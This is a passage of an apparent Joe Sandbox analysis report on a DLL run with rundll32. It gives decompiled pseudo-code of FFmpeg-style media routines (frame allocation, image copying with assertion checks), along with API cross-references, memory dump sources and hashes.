                                                                      								if(_t36 == 0) {
                                                                      									goto L6;
                                                                      								} else {
                                                                      									_t52 = 0;
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      					}
                                                                      				}
                                                                      				return _t52;
                                                                      			}

                                                                      APIs
                                                                      • mv_mallocz.F086 ref: 1001E381
                                                                      • mv_frame_alloc.F086 ref: 1001E390
                                                                        • Part of subcall function 1001AC40: mv_malloc.F086 ref: 1001AC56
                                                                      • mv_frame_ref.F086 ref: 1001E3A6
                                                                        • Part of subcall function 1001BC40: mv_channel_layout_check.F086 ref: 1001BC94
                                                                        • Part of subcall function 1001BC40: mv_channel_layout_check.F086 ref: 1001BCDF
                                                                        • Part of subcall function 1001BC40: mv_buffer_ref.F086 ref: 1001BD0E
                                                                        • Part of subcall function 1001BC40: mv_calloc.F086 ref: 1001BD48
                                                                        • Part of subcall function 1001BC40: mv_buffer_ref.F086 ref: 1001BD97
                                                                      • mv_buffer_ref.F086 ref: 1001E3B4
                                                                        • Part of subcall function 10009FC0: mv_mallocz.F086 ref: 10009FD2
                                                                      • mv_buffer_create.F086 ref: 1001E3ED
                                                                        • Part of subcall function 10009E60: mv_mallocz.F086 ref: 10009E86
                                                                        • Part of subcall function 10009E60: mv_mallocz.F086 ref: 10009EBF
                                                                      • mv_buffer_unref.F086 ref: 1001E413
                                                                      • mv_frame_free.F086 ref: 1001E41B
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: mv_mallocz$mv_buffer_ref$mv_channel_layout_check$mv_buffer_createmv_buffer_unrefmv_callocmv_frame_allocmv_frame_freemv_frame_refmv_malloc
                                                                      • String ID:
                                                                      • API String ID: 2471893243-0
                                                                      • Opcode ID: 50673311061d5e9090930dd3f83a2bf224b626f2df663858ce286107a4d00b9a
                                                                      • Instruction ID: e44850cc1d663ee6b079855d6d5ccf767aeb5a2a45f4db7414dc8b10b7331849
                                                                      • Opcode Fuzzy Hash: 50673311061d5e9090930dd3f83a2bf224b626f2df663858ce286107a4d00b9a
                                                                      • Instruction Fuzzy Hash: EA21B3745087458FD780EF29C58021EFBE0EF89350F51892DFA988B346EB74E881CB92
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 48%
                                                                      			E10022610(void* __eflags, signed int _a4, char _a8, char* _a12, char _a16, intOrPtr _a20, int _a24, signed int _a28) {
                                                                      				char* _v16;
                                                                      				char* _v20;
                                                                      				intOrPtr _v24;
                                                                      				intOrPtr _v32;
                                                                      				intOrPtr _v36;
                                                                      				intOrPtr _v40;
                                                                      				signed int _v44;
                                                                      				intOrPtr _v48;
                                                                      				intOrPtr _v52;
                                                                      				intOrPtr _v56;
                                                                      				signed int _v60;
                                                                      				signed int _v64;
                                                                      				signed int _v68;
                                                                      				intOrPtr _v72;
                                                                      				signed int _v76;
                                                                      				signed int _v80;
                                                                      				signed int _v84;
                                                                      				signed char* _v88;
                                                                      				int _v92;
                                                                      				signed int _v96;
                                                                      				signed int _v100;
                                                                      				signed int _v104;
                                                                      				signed int _v108;
                                                                      				intOrPtr _v120;
                                                                      				char* _v124;
                                                                      				char* _v128;
                                                                      				char* _v132;
                                                                      				int _v136;
                                                                      				intOrPtr* _t175;
                                                                      				signed int _t177;
                                                                      				signed int _t179;
                                                                      				int _t184;
                                                                      				signed int _t185;
                                                                      				signed char _t194;
                                                                      				void* _t197;
                                                                      				signed int _t198;
                                                                      				void* _t199;
                                                                      				signed int _t200;
                                                                      				void* _t201;
                                                                      				signed int _t202;
                                                                      				void* _t203;
                                                                      				signed char _t206;
                                                                      				signed int _t209;
                                                                      				signed int _t210;
                                                                      				void* _t211;
                                                                      				void* _t213;
                                                                      				void* _t219;
                                                                      				signed int _t223;
                                                                      				signed int _t224;
                                                                      				signed int _t225;
                                                                      				int _t226;
                                                                      				signed int _t229;
                                                                      				signed int _t230;
                                                                      				signed int _t231;
                                                                      				int _t235;
                                                                      				signed int _t239;
                                                                      				signed int _t243;
                                                                      				signed int _t244;
                                                                      				int _t254;
                                                                      				signed int _t258;
                                                                      				intOrPtr* _t259;
                                                                      				int _t267;
                                                                      				intOrPtr* _t271;
                                                                      				signed int _t279;
                                                                      				signed int _t280;
                                                                      				void* _t282;
                                                                      				void* _t283;
                                                                      				signed char _t284;
                                                                      				intOrPtr* _t285;
                                                                      				intOrPtr _t287;
                                                                      				void* _t291;
                                                                      				signed int _t295;
                                                                      				void* _t296;
                                                                      				signed int _t301;
                                                                      				void* _t304;
                                                                      				signed int _t306;
                                                                      				void* _t308;
                                                                      				signed int _t314;
                                                                      				signed int _t315;
                                                                      				void _t316;
                                                                      				signed int _t317;
                                                                      				signed int _t319;
                                                                      				void _t320;
                                                                      				void* _t321;
                                                                      				intOrPtr* _t322;
                                                                      				void* _t324;
                                                                      				signed int* _t325;
                                                                      
                                                                      				_t322 = _t321 - 0x7c;
                                                                      				_t271 = _a8;
                                                                      				_t287 = _a20;
                                                                      				_v88 = _a4;
                                                                      				_v92 = _a24;
                                                                      				_v60 =  *_t271;
                                                                      				_v84 = _a12;
                                                                      				_t175 = _a16;
                                                                      				_v96 = _a28;
                                                                      				_v56 =  *((intOrPtr*)(_t271 + 4));
                                                                      				_v52 =  *((intOrPtr*)(_t271 + 8));
                                                                      				_v48 =  *((intOrPtr*)(_t271 + 0xc));
                                                                      				_v44 =  *_t175;
                                                                      				_v40 =  *((intOrPtr*)(_t175 + 4));
                                                                      				_v36 =  *((intOrPtr*)(_t175 + 8));
                                                                      				_v32 =  *((intOrPtr*)(_t175 + 0xc));
                                                                      				 *_t322 = _t287;
                                                                      				_t177 = L10034790(_t219);
                                                                      				_v68 = _t177;
                                                                      				if(_t177 == 0) {
                                                                      					L17:
                                                                      					return _t177;
                                                                      				} else {
                                                                      					_t223 = _t177;
                                                                      					_t177 =  *(_t177 + 8);
                                                                      					if((_t177 & 0x00000008) != 0) {
                                                                      						goto L17;
                                                                      					} else {
                                                                      						_t177 = _t177 & 0x00000002;
                                                                      						if(_t177 == 0) {
                                                                      							_t279 =  *(_t223 + 4) & 0x000000ff;
                                                                      							__eflags = _t279;
                                                                      							if(_t279 == 0) {
                                                                      								goto L17;
                                                                      							} else {
                                                                      								_t179 =  *((intOrPtr*)(_t223 + 0x10));
                                                                      								_t239 = _t223;
                                                                      								_v108 = _t179;
                                                                      								_t224 = _t179 + 1;
                                                                      								__eflags = _t224;
                                                                      								_t177 =  >=  ? _t224 : 0;
                                                                      								__eflags = _t279 - 1;
                                                                      								_v80 = _t177;
                                                                      								_t225 = _t177;
                                                                      								if(_t279 != 1) {
                                                                      									_t198 =  *((intOrPtr*)(_t239 + 0x24));
                                                                      									_v108 = _t198;
                                                                      									_t199 = _t198 + 1;
                                                                      									__eflags = _t225 - _t199;
                                                                      									_t177 =  >=  ? _t225 : _t199;
                                                                      									__eflags = _t279 - 2;
                                                                      									_v80 = _t177;
                                                                      									_t229 = _t177;
                                                                      									if(_t279 != 2) {
                                                                      										_t200 =  *((intOrPtr*)(_t239 + 0x38));
                                                                      										_v108 = _t200;
                                                                      										_t201 = _t200 + 1;
                                                                      										__eflags = _t229 - _t201;
                                                                      										_t177 =  >=  ? _t229 : _t201;
                                                                      										__eflags = _t279 - 3;
                                                                      										_v80 = _t177;
                                                                      										_t230 = _t177;
                                                                      										if(_t279 != 3) {
                                                                      											_t202 =  *((intOrPtr*)(_t239 + 0x4c));
                                                                      											_v108 = _t202;
                                                                      											_t203 = _t202 + 1;
                                                                      											__eflags = _t230 - _t203;
                                                                      											_t177 =  >=  ? _t230 : _t203;
                                                                      											_v80 = _t177;
                                                                      										}
                                                                      									}
                                                                      								}
                                                                      								__eflags = _v80;
                                                                      								if(_v80 == 0) {
                                                                      									goto L17;
                                                                      								} else {
                                                                      									_t301 = 0;
                                                                      									__eflags = 0;
                                                                      									_v64 =  ~_v96;
                                                                      									while(1) {
                                                                      										_v132 = _t301;
                                                                      										 *_t322 = _t287;
                                                                      										_v136 = _v92;
                                                                      										_t184 = E10021480(__eflags);
                                                                      										__eflags = _t184;
                                                                      										_t226 = _t184;
                                                                      										if(_t184 < 0) {
                                                                      											break;
                                                                      										}
                                                                      										_t73 = _t301 - 1; // -1
                                                                      										__eflags = _t73 - 1;
                                                                      										_v104 = _v96;
                                                                      										if(_t73 <= 1) {
                                                                      											_v104 =  ~(_v64 >> ( *(_v68 + 6) & 0x000000ff));
                                                                      										}
                                                                      										_t314 =  *(_t322 + 0x50 + _t301 * 4);
                                                                      										_v108 =  *((intOrPtr*)(_t322 + 0x60 + _t301 * 4));
                                                                      										_t282 =  *(_v84 + _t301 * 4);
                                                                      										_t194 =  *(_v88 + _t301 * 4);
                                                                      										__eflags = _t194;
                                                                      										if(_t194 != 0) {
                                                                      											__eflags = _t282;
                                                                      											if(_t282 != 0) {
                                                                      												_t249 =  <  ? _v108 :  ~_v108;
                                                                      												__eflags = _t226 - ( <  ? _v108 :  ~_v108);
                                                                      												if(_t226 > ( <  ? _v108 :  ~_v108)) {
                                                                      													goto L62;
                                                                      												}
                                                                      												_t252 =  <  ? _t314 :  ~_t314;
                                                                      												__eflags = _t226 - ( <  ? _t314 :  ~_t314);
                                                                      												if(_t226 > ( <  ? _t314 :  ~_t314)) {
                                                                      													goto L64;
                                                                      												}
                                                                      												__eflags = _v104;
                                                                      												if(_v104 > 0) {
                                                                      													_v100 = _t314;
                                                                      													_v76 = _t301;
                                                                      													_v72 = _t287;
                                                                      													goto L34;
                                                                      													L34:
                                                                      													__eflags = _t226 - 8;
                                                                      													_t254 = _t226;
                                                                      													_t291 = _t194;
                                                                      													_t304 = _t282;
                                                                      													if(_t226 >= 8) {
                                                                      														__eflags = _t194 & 0x00000001;
                                                                      														if((_t194 & 0x00000001) != 0) {
                                                                      															_t291 = _t194 + 1;
                                                                      															_t304 = _t282 + 1;
                                                                      															 *_t194 =  *_t282 & 0x000000ff;
                                                                      															_t112 = _t226 - 1; // -1
                                                                      															_t254 = _t112;
                                                                      														}
                                                                      														__eflags = _t291 & 0x00000002;
                                                                      														if((_t291 & 0x00000002) != 0) {
                                                                      															_t315 =  *_t304 & 0x0000ffff;
                                                                      															_t291 = _t291 + 2;
                                                                      															_t304 = _t304 + 2;
                                                                      															_t254 = _t254 - 2;
                                                                      															 *(_t291 - 2) = _t315;
                                                                      														}
                                                                      														__eflags = _t291 & 0x00000004;
                                                                      														if((_t291 & 0x00000004) != 0) {
                                                                      															_t316 =  *_t304;
                                                                      															_t291 = _t291 + 4;
                                                                      															_t304 = _t304 + 4;
                                                                      															_t254 = _t254 - 4;
                                                                      															 *(_t291 - 4) = _t316;
                                                                      														}
                                                                      													}
                                                                      													_t197 = memcpy(_t291, _t304, _t254);
                                                                      													_t322 = _t322 + 0xc;
                                                                      													_t194 = _t197 + _v100;
                                                                      													_t282 = _t282 + _v108;
                                                                      													_t96 =  &_v104;
                                                                      													 *_t96 = _v104 - 1;
                                                                      													__eflags =  *_t96;
                                                                      													if( *_t96 == 0) {
                                                                      														_t301 = _v76;
                                                                      														_t287 = _v72;
                                                                      													} else {
                                                                      														goto L34;
                                                                      													}
                                                                      												}
                                                                      											}
                                                                      										}
                                                                      										_t177 = _v80;
                                                                      										_t301 = _t301 + 1;
                                                                      										__eflags = _t301 - _t177;
                                                                      										if(__eflags != 0) {
                                                                      											continue;
                                                                      										} else {
                                                                      											goto L17;
                                                                      										}
                                                                      										goto L75;
                                                                      									}
                                                                      									_a12 = "av_image_get_linesize failed\n";
                                                                      									_a8 = 0x10;
                                                                      									_a4 = 0;
                                                                      									_t324 = _t322 + 0x7c;
                                                                      									_t325 = _t324 - 0x1c;
                                                                      									_t185 = _a4;
                                                                      									_t280 =  *0x100ad010;
                                                                      									__eflags = _t185;
                                                                      									if(_t185 != 0) {
                                                                      										_t243 =  *_t185;
                                                                      										__eflags = _t243;
                                                                      										if(_t243 != 0) {
                                                                      											__eflags =  *((intOrPtr*)(_t243 + 0xc)) - 0x320f01;
                                                                      											if( *((intOrPtr*)(_t243 + 0xc)) > 0x320f01) {
                                                                      												_t244 =  *(_t243 + 0x10);
                                                                      												__eflags = _t244;
                                                                      												if(_t244 != 0) {
                                                                      													__eflags = _a8 - 7;
                                                                      													if(_a8 > 7) {
                                                                      														_t165 =  &_a8;
                                                                      														 *_t165 = _a8 +  *((intOrPtr*)(_t185 + _t244));
                                                                      														__eflags =  *_t165;
                                                                      													}
                                                                      												}
                                                                      											}
                                                                      										}
                                                                      									}
                                                                      									__eflags = _t280;
                                                                      									if(_t280 != 0) {
                                                                      										 *_t325 = _t185;
                                                                      										_v16 =  &_a16;
                                                                      										_v20 = _a12;
                                                                      										_v24 = _a8;
                                                                      										_t185 =  *_t280();
                                                                      									}
                                                                      									return _t185;
                                                                      								}
                                                                      							}
                                                                      						} else {
                                                                      							_t317 = _v44;
                                                                      							_t231 = _v60;
                                                                      							_t283 =  *_v84;
                                                                      							_t206 =  *_v88;
                                                                      							if(_t206 == 0 || _t283 == 0) {
                                                                      								L42:
                                                                      								_t258 =  *(_v84 + 4);
                                                                      								_t284 = _v88[4];
                                                                      								goto L43;
                                                                      							} else {
                                                                      								_t262 =  <  ? _t317 :  ~_t317;
                                                                      								_t333 = _v92 - ( <  ? _t317 :  ~_t317);
                                                                      								if(_v92 > ( <  ? _t317 :  ~_t317)) {
                                                                      									L62:
                                                                      									_v120 = 0x15e;
                                                                      									_v124 = "libavutil/imgutils.c";
                                                                      									_v128 = "((src_linesize) >= 0 ? (src_linesize) : (-(src_linesize))) >= bytewidth";
                                                                      									L63:
                                                                      									 *_t322 = 0;
                                                                      									_v132 = "Assertion %s failed at %s:%d\n";
                                                                      									__eflags = 0;
                                                                      									_v136 = 0;
                                                                      									L66();
                                                                      									abort();
                                                                      									L64:
                                                                      									_v120 = 0x15f;
                                                                      									_v124 = "libavutil/imgutils.c";
                                                                      									_v128 = "((dst_linesize) >= 0 ? (dst_linesize) : (-(dst_linesize))) >= bytewidth";
                                                                      									goto L63;
                                                                      								}
                                                                      								_t265 =  <  ? _t231 :  ~_t231;
                                                                      								_t334 = _v92 - ( <  ? _t231 :  ~_t231);
                                                                      								if(_v92 > ( <  ? _t231 :  ~_t231)) {
                                                                      									goto L64;
                                                                      								}
                                                                      								if(_v96 <= 0) {
                                                                      									goto L42;
                                                                      								} else {
                                                                      									_v104 = _t231;
                                                                      									_t235 = _v92;
                                                                      									_v108 = _t317;
                                                                      									do {
                                                                      										_t267 = _t235;
                                                                      										_t296 = _t206;
                                                                      										_t308 = _t283;
                                                                      										if(_t235 >= 8) {
                                                                      											if((_t206 & 0x00000001) != 0) {
                                                                      												_t296 = _t206 + 1;
                                                                      												_t308 = _t283 + 1;
                                                                      												 *_t206 =  *_t283 & 0x000000ff;
                                                                      												_t267 = _t235 - 1;
                                                                      											}
                                                                      											if((_t296 & 0x00000002) != 0) {
                                                                      												_t319 =  *_t308 & 0x0000ffff;
                                                                      												_t296 = _t296 + 2;
                                                                      												_t308 = _t308 + 2;
                                                                      												_t267 = _t267 - 2;
                                                                      												 *(_t296 - 2) = _t319;
                                                                      											}
                                                                      											if((_t296 & 0x00000004) != 0) {
                                                                      												_t320 =  *_t308;
                                                                      												_t296 = _t296 + 4;
                                                                      												_t308 = _t308 + 4;
                                                                      												_t267 = _t267 - 4;
                                                                      												 *(_t296 - 4) = _t320;
                                                                      											}
                                                                      										}
                                                                      										_t213 = memcpy(_t296, _t308, _t267);
                                                                      										_t322 = _t322 + 0xc;
                                                                      										_t206 = _t213 + _v104;
                                                                      										_t283 = _t283 + _v108;
                                                                      										_t40 =  &_v96;
                                                                      										 *_t40 = _v96 - 1;
                                                                      									} while ( *_t40 != 0);
                                                                      									_t284 = _v88[4];
                                                                      									_t177 =  *(_v68 + 8) & 0x00000002;
                                                                      									__eflags = _t177;
                                                                      									if(_t177 != 0) {
                                                                      										_t258 =  *(_v84 + 4);
                                                                      										goto L43;
                                                                      									} else {
                                                                      										__eflags = _t284;
                                                                      										if(_t284 != 0) {
                                                                      											_t177 = _v84;
                                                                      											_t258 =  *(_t177 + 4);
                                                                      											__eflags = _t258;
                                                                      											if(_t258 != 0) {
                                                                      												L43:
                                                                      												__eflags = _t284 & 0x00000001;
                                                                      												_t306 = 0x400;
                                                                      												if((_t284 & 0x00000001) != 0) {
                                                                      													_t209 =  *_t258 & 0x000000ff;
                                                                      													_t284 = _t284 + 1;
                                                                      													_t258 = _t258 + 1;
                                                                      													_t306 = 0x3ff;
                                                                      													 *(_t284 - 1) = _t209;
                                                                      												}
                                                                      												__eflags = _t284 & 0x00000002;
                                                                      												if((_t284 & 0x00000002) != 0) {
                                                                      													_t210 =  *_t258 & 0x0000ffff;
                                                                      													_t284 = _t284 + 2;
                                                                      													_t258 = _t258 + 2;
                                                                      													_t306 = _t306 - 2;
                                                                      													 *(_t284 - 2) = _t210;
                                                                      												}
                                                                      												_t211 = 0;
                                                                      												_t295 = _t306 & 0xfffffff8;
                                                                      												__eflags = _t295;
                                                                      												do {
                                                                      													 *((intOrPtr*)(_t284 + _t211)) =  *((intOrPtr*)(_t258 + _t211));
                                                                      													 *((intOrPtr*)(_t284 + _t211 + 4)) =  *((intOrPtr*)(_t258 + _t211 + 4));
                                                                      													_t211 = _t211 + 8;
                                                                      													__eflags = _t211 - _t295;
                                                                      												} while (_t211 < _t295);
                                                                      												_t285 = _t284 + _t211;
                                                                      												_t259 = _t258 + _t211;
                                                                      												_t177 = 0;
                                                                      												__eflags = _t306 & 0x00000004;
                                                                      												if((_t306 & 0x00000004) != 0) {
                                                                      													 *_t285 =  *_t259;
                                                                      													_t177 = 4;
                                                                      												}
                                                                      												__eflags = _t306 & 0x00000002;
                                                                      												if((_t306 & 0x00000002) != 0) {
                                                                      													 *((short*)(_t285 + _t177)) =  *(_t259 + _t177) & 0x0000ffff;
                                                                      													_t177 = _t177 + 2;
                                                                      													__eflags = _t177;
                                                                      												}
                                                                      												__eflags = _t306 & 0x00000001;
                                                                      												if((_t306 & 0x00000001) != 0) {
                                                                      													 *((char*)(_t285 + _t177)) =  *(_t259 + _t177) & 0x000000ff;
                                                                      												}
                                                                      											} else {
                                                                      											}
                                                                      										}
                                                                      									}
                                                                      								}
                                                                      							}
                                                                      							goto L17;
                                                                      						}
                                                                      					}
                                                                      				}
                                                                      				L75:
                                                                      			}
                                                                      0x1002280d
                                                                      0x00000000
                                                                      0x1002280f
                                                                      0x10022813
                                                                      0x10022813
                                                                      0x10022817
                                                                      0x10022820
                                                                      0x10022820
                                                                      0x10022828
                                                                      0x1002282b
                                                                      0x1002282f
                                                                      0x10022834
                                                                      0x10022836
                                                                      0x10022838
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x10022842
                                                                      0x10022845
                                                                      0x10022848
                                                                      0x1002284c
                                                                      0x10022920
                                                                      0x10022920
                                                                      0x10022856
                                                                      0x1002285a
                                                                      0x10022862
                                                                      0x10022869
                                                                      0x1002286c
                                                                      0x1002286e
                                                                      0x10022874
                                                                      0x10022876
                                                                      0x10022882
                                                                      0x10022887
                                                                      0x10022889
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x10022893
                                                                      0x10022896
                                                                      0x10022898
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x100228a2
                                                                      0x100228a4
                                                                      0x100228aa
                                                                      0x100228ae
                                                                      0x100228b2
                                                                      0x100228b6
                                                                      0x100228d8
                                                                      0x100228d8
                                                                      0x100228db
                                                                      0x100228dd
                                                                      0x100228df
                                                                      0x100228e1
                                                                      0x100228e3
                                                                      0x100228e5
                                                                      0x1002294b
                                                                      0x1002294e
                                                                      0x10022951
                                                                      0x10022953
                                                                      0x10022953
                                                                      0x10022953
                                                                      0x100228e7
                                                                      0x100228ed
                                                                      0x10022930
                                                                      0x10022933
                                                                      0x10022936
                                                                      0x10022939
                                                                      0x1002293c
                                                                      0x1002293c
                                                                      0x100228ef
                                                                      0x100228f5
                                                                      0x100228f7
                                                                      0x100228f9
                                                                      0x100228fc
                                                                      0x100228ff
                                                                      0x10022902
                                                                      0x10022902
                                                                      0x100228f5
                                                                      0x100228c0
                                                                      0x100228c0
                                                                      0x100228ca
                                                                      0x100228cc
                                                                      0x100228ce
                                                                      0x100228ce
                                                                      0x100228ce
                                                                      0x100228d2
                                                                      0x10022780
                                                                      0x10022784
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x100228d2
                                                                      0x100228a4
                                                                      0x10022876
                                                                      0x10022788
                                                                      0x1002278c
                                                                      0x1002278d
                                                                      0x1002278f
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x1002278f
                                                                      0x10022a20
                                                                      0x10022a29
                                                                      0x10022a30
                                                                      0x10022a37
                                                                      0x10026560
                                                                      0x10026563
                                                                      0x10026567
                                                                      0x1002656d
                                                                      0x1002656f
                                                                      0x10026571
                                                                      0x10026573
                                                                      0x10026575
                                                                      0x10026577
                                                                      0x1002657e
                                                                      0x10026580
                                                                      0x10026583
                                                                      0x10026585
                                                                      0x10026587
                                                                      0x1002658c
                                                                      0x10026591
                                                                      0x10026591
                                                                      0x10026591
                                                                      0x10026591
                                                                      0x1002658c
                                                                      0x10026585
                                                                      0x1002657e
                                                                      0x10026575
                                                                      0x100265a0
                                                                      0x100265a2
                                                                      0x100265a4
                                                                      0x100265ab
                                                                      0x100265b3
                                                                      0x100265bb
                                                                      0x100265bf
                                                                      0x100265bf
                                                                      0x100265c4
                                                                      0x100265c4
                                                                      0x1002280d
                                                                      0x100226c1
                                                                      0x100226c5
                                                                      0x100226c9
                                                                      0x100226cd
                                                                      0x100226d3
                                                                      0x100226d7
                                                                      0x10022958
                                                                      0x1002295c
                                                                      0x10022963
                                                                      0x00000000
                                                                      0x100226e5
                                                                      0x100226e9
                                                                      0x100226ec
                                                                      0x100226f0
                                                                      0x10022a92
                                                                      0x10022a92
                                                                      0x10022a9a
                                                                      0x10022aa2
                                                                      0x10022aaa
                                                                      0x10022aaa
                                                                      0x10022ab6
                                                                      0x10022aba
                                                                      0x10022abc
                                                                      0x10022ac0
                                                                      0x10022ac5
                                                                      0x10022aca
                                                                      0x10022aca
                                                                      0x10022ad2
                                                                      0x10022ada
                                                                      0x00000000
                                                                      0x10022ada
                                                                      0x100226fa
                                                                      0x100226fd
                                                                      0x10022701
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x1002270d
                                                                      0x00000000
                                                                      0x10022713
                                                                      0x10022713
                                                                      0x10022717
                                                                      0x1002271b
                                                                      0x10022740
                                                                      0x10022743
                                                                      0x10022745
                                                                      0x10022747
                                                                      0x10022749
                                                                      0x1002274d
                                                                      0x10022a5b
                                                                      0x10022a5e
                                                                      0x10022a61
                                                                      0x10022a63
                                                                      0x10022a63
                                                                      0x10022759
                                                                      0x10022a43
                                                                      0x10022a46
                                                                      0x10022a49
                                                                      0x10022a4c
                                                                      0x10022a4f
                                                                      0x10022a4f
                                                                      0x10022765
                                                                      0x10022767
                                                                      0x10022769
                                                                      0x1002276c
                                                                      0x1002276f
                                                                      0x10022772
                                                                      0x10022772
                                                                      0x10022765
                                                                      0x10022728
                                                                      0x10022728
                                                                      0x10022732
                                                                      0x10022734
                                                                      0x10022736
                                                                      0x10022736
                                                                      0x10022736
                                                                      0x100229e4
                                                                      0x100229f1
                                                                      0x100229f1
                                                                      0x100229f4
                                                                      0x10022ae8
                                                                      0x00000000
                                                                      0x100229fa
                                                                      0x100229fa
                                                                      0x100229fc
                                                                      0x10022a02
                                                                      0x10022a06
                                                                      0x10022a09
                                                                      0x10022a0b
                                                                      0x10022966
                                                                      0x10022966
                                                                      0x10022969
                                                                      0x1002296e
                                                                      0x10022a80
                                                                      0x10022a83
                                                                      0x10022a84
                                                                      0x10022a85
                                                                      0x10022a8a
                                                                      0x10022a8a
                                                                      0x10022974
                                                                      0x10022977
                                                                      0x10022a6b
                                                                      0x10022a6e
                                                                      0x10022a71
                                                                      0x10022a74
                                                                      0x10022a77
                                                                      0x10022a77
                                                                      0x1002297f
                                                                      0x10022981
                                                                      0x10022981
                                                                      0x10022984
                                                                      0x1002298b
                                                                      0x1002298e
                                                                      0x10022992
                                                                      0x10022995
                                                                      0x10022995
                                                                      0x10022999
                                                                      0x1002299b
                                                                      0x1002299d
                                                                      0x1002299f
                                                                      0x100229a5
                                                                      0x100229a9
                                                                      0x100229ab
                                                                      0x100229ab
                                                                      0x100229b0
                                                                      0x100229b6
                                                                      0x100229bc
                                                                      0x100229c0
                                                                      0x100229c0
                                                                      0x100229c0
                                                                      0x100229c3
                                                                      0x100229c6
                                                                      0x100229d0
                                                                      0x100229d0
                                                                      0x00000000
                                                                      0x10022a11
                                                                      0x10022a0b
                                                                      0x100229fc
                                                                      0x100229f4
                                                                      0x1002270d
                                                                      0x00000000
                                                                      0x100226d7
                                                                      0x100226bb
                                                                      0x100226af
                                                                      0x00000000

                                                                      APIs
                                                                      Strings
                                                                      • Assertion %s failed at %s:%d, xrefs: 10022AB1
                                                                      • av_image_get_linesize failed, xrefs: 10022A16
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: abortmv_image_get_linesizemv_logmv_pix_fmt_desc_get
                                                                      • String ID: Assertion %s failed at %s:%d$av_image_get_linesize failed
                                                                      • API String ID: 1423692287-2525362290
                                                                      • Opcode ID: 3ba8b928b0e2e591675b6da61631b884aeed625d3802fe22cac3d10d96b15f9a
                                                                      • Instruction ID: a2789ba4896ffccc60d1fb11a9358e28422a5f1174f25c27da114458ab982159
                                                                      • Opcode Fuzzy Hash: 3ba8b928b0e2e591675b6da61631b884aeed625d3802fe22cac3d10d96b15f9a
                                                                      • Instruction Fuzzy Hash: 59D1AC75A093519FC354CF68D080A2AFBF1FF88354F96896DE8899B311E735E981CB42
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                        • Part of subcall function 1002B8B0: strcmp.MSVCRT ref: 1002B8E8
                                                                        • Part of subcall function 1002B8B0: strcmp.MSVCRT ref: 1002B908
                                                                      • mv_log.F086 ref: 1002D38B
                                                                      • mv_log.F086 ref: 1002D4D3
                                                                      Strings
                                                                      • Value %f for parameter '%s' is not a valid set of 32bit integer flags, xrefs: 1002D500
                                                                      • Value %f for parameter '%s' out of range [%g - %g], xrefs: 1002D4B3
                                                                      • The value set by option '%s' is not a video rate., xrefs: 1002D379
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: mv_logstrcmp
